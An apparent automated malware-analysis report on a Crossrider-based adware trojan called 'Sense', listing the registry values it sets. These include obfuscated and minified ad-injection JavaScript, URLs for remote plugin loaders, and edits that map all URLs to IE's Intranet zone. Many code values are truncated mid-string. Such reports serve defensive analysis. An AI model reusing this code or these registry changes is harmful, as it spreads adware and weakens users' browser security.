    "JavaScript" = "(function(i){var l=05-20;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstatsservice.com/monetization_campaigns/,statsHostUrl:http://logs.clientstatsservice.com/monetization.gif?,errorHostUrl:http://errors.clientstatsservice.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyA["

    [HKCU\Software\Sense\Plugins\177]
    "JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
    [HKCU\Software\Sense\Manifest]
    "DisableIe" = "true"
    "IsButtonEnabled" = "false"

    [HKCU\Software\Sense\Plugins\192]
    "Name" = "revizer_ws_dynamic_b2b_m"

    [HKCU\Software\Sense\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\Sense\Plugins\40]
    "Name" = "IEExtension"

    [HKCU\Software\Sense\Manifest]
    "PluginsManifestVersion" = "50"
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\Crossrider]
    "Bic" = "4252D7B4B8E54E2E95F19018ADCF24D9IE"

    [HKCU\Software\Sense\Plugins\39]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEDatabase.js"

    [HKCU\Software\Sense\Plugins\64]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functir["

    [HKCU\Software\Sense\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKCU\Software\Sense\Manifest]
    "homepageurl" = "NA"
    "EnableSearchIE" = "false"
    "ThanksUrl" = "NA"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

    [HKCU\Software\Sense\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

    [HKCU\Software\Sense\Installer]
    "Params" = "{ source_id : 000803, sub_id : 0, uzid : eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0="

    [HKCU\Software\Sense\Plugins\46]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IETimers.js"

    [HKCU\Software\Sense\Plugins\17]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/jQuery.js"

    [HKCU\Software\Sense\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\Sense\Plugins\64]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiMessage.js"

    [HKCU\Software\Sense\Plugins\45]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEOnRequest.js"

    [HKCU\Software\Sense\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,103,104,123,155,180,184,192,193,220,195,211,223,230,233,239,242,244,177,91,28"

    Proxy settings are disabled:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "1"

    The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

    "ProxyBypass" = "1"

    The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

    "IntranetName" = "1"

    The Trojan deletes the following value(s) in system registry:

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "AutoConfigURL"
    "ProxyServer"
    "ProxyOverride"

    The process Sense-codedownloader.exe:216 makes changes in the system registry.
    The Trojan creates and/or sets the following values in system registry:

    [HKCU\Software\Sense\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\Sense\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object // alert(My new Crossrider extension works! The current page is: document.location.href);});"

    [HKCU\Software\Sense\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\Sense\Plugins\155]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2MjdiNTUwMzFkMGUwODIxMDYxNDRhNDg1NzQ5MDEwZTBjMDQ0ZTU3NDcxMTFiMDAwNDE1MTY1YTE3MTcwNTVkMTYwZjNhMWYwYTAyMTE1NzBmMTcwMzNmMDgxZDQ3MTcxZDFjNTUyZDI4MjgzYjM1MmIyNzI2MzEyYzM3MjUzNDNhMmYzYTJiM2QzYzM3MmQ1MTFiMDAxZTQ1MzcyNjJiM2EzNjI1NGQxZDAzMDgxMTQ5MTEwNjE4MTIwODFkNTg1NDdlN2Q1YTE4MWUwMjBjMDAxNDMxMTA1NjQyNDg0MzQyNWU0NTcwNTg1NDU0NTg0YTA0MTIxOTFkMTMxYjE1MTg1YTUyNTIyYzQ5MTkxNTA4MDc1NjI1NjIwZg==', 'xhrwkizxtt'); }"

    [HKCU\Software\Sense\Plugins\9]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\Sense\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbacuO"

    [HKCU\Software\Sense\Plugins\40]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "3C 00 00 00 26 00 00 00 01 00 00 00 00 00 00 00"

    [HKCU\Software\Sense\Plugins\91]
    "Version" = "50"

    [HKCU\Software\Sense\Plugins\45]
    "Name" = "IEOnRequest"

    [HKCU\Software\Sense\Plugins\192]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI3ZTczNDcwZTFkMTkxMzNmMDQwNTU2NDA0NTQ0MDExOTE3MWE0YzQ2NWIxYjE2MTQxZjQwMDI0NDE3MDIxNTE3MDQwZjAxMDk0ZDA0MTMxZDViMDkwMTQ5NTg1YTUzNWE1OTU4NDQ0YTVkNDgwMzFlNDE0NjdjNjA1NjEyMTExMjE5MWUzNjE4MWE0YjRlNWE0NzBlMWQxOTEzMTk0YzQ2NWIxYjE2MTQxZjQwMDI0NDE3MDIxNTE3MDQwZjAxMDk0ZDA0MTMxZDViMDkwMTQ5NTg1YTUzNWE1OTU4NDQ0YTVkNDgwMzFlNDE0NjdjNjA1NjBhMDkxMzBlMDQwZDIzMTI0YjRlNWE1NDVmNWI0MTY5NGE1NjQ5NTQ1ODEzMDMxYjE5MGEwOTE3MDU1NjQwNDUzZDRiMGMwNzE5NTQzNDU4NzA0NTQ2NDk0ZDQxMDMxODA1MWQxNDAwMmMzYTRmNTk0YTU0MWUxZDE0MDEwOTFlNDMzYzE4MDAxMzQ1NGQ1NTU2MTE1YzUzNWE0ZTQ5NDk1YTFlNDY0ZTFkMTYwODFhMDAwNzEyMDAxNDM2MWUxNjA4MWYwZDUzNDA0NTQxMzYzMjIwMzgzOTNhMjcyODJjMjIyYzNmM2MyNjNmMmUzYzJlM2EzNTNjMmYzYzIzMzIzNjJiNWQ0NTRkNDk0YTUzNWE0NjU5NDQ0YTU1NTY1OTVkNTM0ZDBiNTI1NjcwMTg=', 'itzefimcjv'); }"

    [HKCU\Software\Sense\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\Sense\Plugins\94]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\Sense\Plugins\223]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/imonomy_m.js"

    [HKCU\Software\Sense\Plugins\263]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/intext_5_j_m.js"

    [HKCU\Software\Sense\Plugins\211]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2MTdhNDEwZDEwMTEwNzIxMDUwODQ5NDk0MzQ3MGMxMTAzMDQ0ZDRiNDQxMjEwMTcxMjQ4MTY1YTE2MGYwYTFlMDIwYzBjMDE1OTFhMTIxMDQ0MDAwNzRhNTU1MjQ3NDQ1ODU1NWI0NzU2NGIwZTE2NTU1ODdkNmQ0OTFiMTcxMTE0MTYyMjA2MWI0NjUxNTM0MTBkMTAxMTA3MDc0ZDRiNDQxMjEwMTcxMjQ4MTY1YTE2MGYwYTFlMDIwYzBjMDE1OTFhMTIxMDQ0MDAwNzRhNTU1MjQ3NDQ1ODU1NWI0NzU2NGIwZTE2NTU1ODdkNmQ0OTAzMGYxMDAzMGMxOTNkMTM0NjUxNTM1MTU0NTU0OTdkNTQ1NzQ0NGI1MTE1MDAxNjExMWUxNzE2MDg0OTQ5NDMzZTQ2MDQxMzA3NTUzOTQ3Nzk0MzQ1NDQ0NTU1MWQxOTA4MDIxZDA2MmYzNzQ3NGQ1NDU1MTMwMjFkMDcwYTEzNGIyODA2MDExZTVhNDQ1MzU1MWM1NDQ3NDA0MjQ0NTY1MzE4NDU0MzE1MDIxNjFiMGQxODFiMDYxNzNiMTYwMjE2MWUwMDRjNDk0MzQyM2IzYTM0MjYzODM3MzgyMTJhMjEyMTM3MjgzODNlMjMyMzI3M2MzNjMxMjcyODNkMzMzYjM0NTQ0MzRlNDQ0MjQ3NDQ0NzU0NWI0MzUzNTU1NDU1NDc1MzBhNWY0OTc5MWU=', 'dkscedewtw'); }"

    [HKCU\Software\Sense\Plugins\242]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\155]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ibario_pops_m.js"

    [HKCU\Software\Sense\Plugins\220]
    "Name" = "icm_base_m"

    [HKCU\Software\Sense\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,escapable=/[\\\\x00-\x1f\x7f-c"

    [HKCU\Software\Sense\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\Sense\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveO"

    [HKCU\Software\Sense\Plugins\47]
    "Version" = "3"

    [HKCU\Software\Sense\Plugins\230]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWM2ZDZmNDQwNzExMTMxZDI3MWIwYjQ1NWM0NjRkMGQxMzE5MDI1MzQ4NDgwNzE1MWQxMzRhMGM1YzA4MGMwNjBiMDcwNjBkMDM0MzFjMGMxMzQ4MTUwMjQwNTQ1MDVkNDI0NjU2NTc1MjUwNDEwZjE0NGY1ZTYzNmU0NTBlMTIxYjE1MTQzODAwMDU0NTVkNDY0NDA3MTExMzFkMDE1MzQ4NDgwNzE1MWQxMzRhMGM1YzA4MGMwNjBiMDcwNjBkMDM0MzFjMGMxMzQ4MTUwMjQwNTQ1MDVkNDI0NjU2NTc1MjUwNDEwZjE0NGY1ZTYzNmU0NTE2MGExYTAyMGUwMzNiMGQ0NTVkNDY1NDVjNTU0YjY3NTI0OTQ3NDc0NDEwMGExNzEzMDQxMTA4MGI0NTVjNDYzNDQ3MDYwOTAxNGIzYTRiNmM0NjRmNDU0NzRmMWIwNzBiMGUwODAzMjUzNjQ1NTc1MjRiMTAwZTA4MDIwMDEyNDkzMjAwMWYxZDU2NTE1NjVmMWQ1NjVkNDY1ZjQ3NWE0NjFkNGY0MjE3MTgxMDA1MGUxNDBlMDMxZDNhMTQxODEwMDAwMzQwNWM0NjQ4M2EzODJlMjAyNjM0MzQzNDJmMmIyMDM1MzIzZTIwMjAyZjMyMzkzYzMwMjUzMjNiMmQzODM4NDE0NjQ0NDU0MDVkNDI1OTU3NTc1NjU2NWY1NTU3NWQ1NTE0NWM0NTZjMWI=', 'ggffoegmri'); }"

    [HKCU\Software\Sense\Manifest]
    "Version" = "61"

    [HKCU\Software\Sense\Plugins\195]
    "Name" = "icm_convertmedia_m"

    [HKCU\Software\Sense\Plugins\7]
    "Name" = "hooks"

    [HKCU\Software\Sense\Plugins\195]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"

    [HKCU\Software\Sense\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOb"

    [HKCU\Software\Sense\Plugins\177]
    "Name" = "crossriderDashboard"

    [HKCU\Software\Sense\Plugins\91]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/monetizationLoader.js"

    [HKCU\Software\Sense\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Sense\Manifest]
    "UninstallerOfferUrl" = "NA"

    [HKCU\Software\Sense\Plugins\94]
    "Name" = "IEPopup"

    [HKCU\Software\Sense\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\Sense\Plugins\36]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEBackground.js"

    [HKCU\Software\Sense\Plugins\263]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3ODQzNDI1ODRjNTYwZTA1MWYxYTI3MTEwZTVhNTY1NDQ0MTkxZjFlMDI1OTRkNTcwZjEwMDgxMjBhMDkxYTA2NTM1NTBkNWEwNzFhMGEwNzEzMGEwYTFjNDIxYTAzMDU0NDE5MDcwMTRkMGU1ZjQ2NTc0ODA5MGU1ZDNjM2QzYjNlM2IzNTIyMzkyMzM2MjYzMDI3M2YyMTI0MmUyMjJlMmQzYzRkMTQ0MjFlMTU0ZTFiMDMxNjVlNTM0ODU1NDA0MDE0MTMxZTRmM2MzZDNiM2UzYjM1MjIzOTIzMzYyNjMwMjcyZDI0MzYyZTI1MmIzZjI2M2QyNzRhMDcxZjAyMWYwZjFmMGEwNjQ1MzMyYjI1MjMyNDM5MjEzMTJiM2MyOTI2MzkzODI1MzkyNjIyMmUzNDI5MjYzOTI0MzgyZjIwM2MyYjNjMzMyYjQ0NWQ2MTRhNTI0MzQyNWEwNDAwMTIwMTE4M2YwMDBmNDA0MjRjNTYwZTA1MWYxYTAxNTk0ZDU3MGYxMDA4MTIwYTA5MWEwNjUzNTUwZDVhMDcxYTBhMDcxMzBhMGExYzQyMWEwMzA1NDQxOTA3MDE0ZDBlNWY0NjU3NDgwOTBlNWQzYzNkM2IzZTNiMzUyMjM5MjMzNjI2MzAyNzNmMjEyNDJlMjIyZTJkM2M0ZDE0NDIxZTE1NGUxYjAzMTY1ZTUzNDg1NTQwNDAxNDEzMWU0ZjNjM2QzYjNlM2IzNTIyMzkyMzM2MjYzMDI3MmQyNDM2MmUyNTJiM2YyNjNkMjc0YTA3MWYwMjFmMGYxZjBhMDY0NTMzMmIyNTIzMjQzOTIxMzEyYjNjMjkyNjM5MzgyNTM5MjYyMjJlMzQyOTI2MzkyNDM4MmYyMDNjMmIzYzMzMmI0NDVkNjE0YTUyNDM0MjVhMWMxODEzMTYwMjA0M2IwNzQwNDI0YzQ2NTA0MjYxMTc=', 'jrcbxltfqk')ï¿¿b"

    [HKCU\Software\Sense\Plugins\226]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

    [HKCU\Software\Sense\Plugins\78]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\183]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\47]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources_background.js"

    [HKCU\Software\Sense\Plugins\45]
    "Version" = "4"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
    "CacheLimit" = "65452"

    [HKCU\Software\Sense\Plugins\9]
    "JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,url"

    [HKCU\Software\Sense\Manifest]
    "RunInFrame" = "false"
    "PublisherName" = "Object Browser"

    [HKCU\Software\Sense\Plugins\1]
    "Name" = "base"

    [HKCU\Software\Sense\Plugins\28]
    "JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

    [HKCU\Software\Sense\Plugins\17]
    "Version" = "4"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "History" = "%Documents and Settings%\%current user%\Local Settings\History"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Sense\Plugins\44]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMisc.js"

    [HKCU\Software\Sense\Plugins\43]
    "Name" = "IEMessaging"

    [HKCU\Software\Sense\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\Sense\Manifest]
    "SetNewTab" = "false"

    [HKCU\Software\Sense\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
    "Paths" = "4"

    [HKCU\Software\Sense\Plugins\207]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActib"
    "Version" = "4"

    [HKCU\Software\Sense\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\Sense\Plugins\223]
    "Version" = "5"

    [HKCU\Software\Sense\Plugins\94]
    "Version" = "2"

    [HKCU\Software\Sense\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Sense\Plugins\226]
    "Version" = "4"

    [HKCU\Software\Sense\Plugins\41]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEInfo.js"

    [HKCU\Software\Sense\Plugins\72]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/appApiValidation.js"

    [HKCU\Software\Sense\Plugins\180]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2MDYwNDgxZDE5MDEwMjM3MTUxODQ4NTM0YTU3MDUwMTA2MTI1ZDViNDUwODBlMDY0MzAxMTQxYTBlMDU0NDBhMDUxODQyMTQ1YzEyMGYwNDU1NWY1ODQzMWYxMDE0NTA1YTJiMzUyYTM4M2EzZTI2MjAyYjIzMzEzODM2MzkyMDJmMmEzYjI2MzgyYjRjNWY1ODQzMjMxNDFmMDc1YTJiMzUyYTM4M2EzZTI2MjAyYjIzMzEzODM2MmIyNTNkMmEzYzIzMmEzMTM1MzY0YzQzNWY0MzAwMDcwMTQ3NTczNjM1MzYzZjNhMjEzMTM1M2QyZTJjMzgyYTM4MjYzNzMwMzgzZDJlMzYzNTUzNWI0NzQ0MTAwMjEyNWI1NDVjNDY1YTQ3NDQwNDUwNDc1ZDVhNWQ0NzViNGM0NDU2NTE0MTVkNWI0YzAxMDgxYzE2NWYzODJiMjkzYjI1MjYzZTI3M2IyNjIyMjYzNTI4M2EyNTMyM2MzNjNkMzg1MjFlMWMwMzExNTAyYTJkMjEzNTNiMzkzYTM4M2MyOTMwMjAzZDJlM2EzOTNkMmIzOTIxMzAyMDNkMzIyNzJmM2IzNTNjMjkyYTJkNDA0YjdlNjM0YjAyMDExOTA1MDEzNzE1MTg0ODUzNGE1NzA1MDEwNjEyMTQ0ZTQ1NDYwYjExMWU1YjA2MDQxZjFkMWI0NzA5MWEwMDVhMTM0YzE3MWMxYTU2NWM0NzViMDcxNzA0NTU0OTM1MzYyOTI3MjIyNjIxMzAyZTMwMmYzYjM1MjYzODM3MmQyYjIzMmIzNTRmNWM0NzViM2IxMzBmMDI0OTM1MzYyOTI3MjIyNjIxMzAyZTMwMmYzYjM1MzQzZDI1MmQyYzI2MzkyZjM2MzU1MzViNDc0NDEwMDIxMjU5NTQzNTJhMmUyNzNkMzEzNDI2MjMyZDJmMjc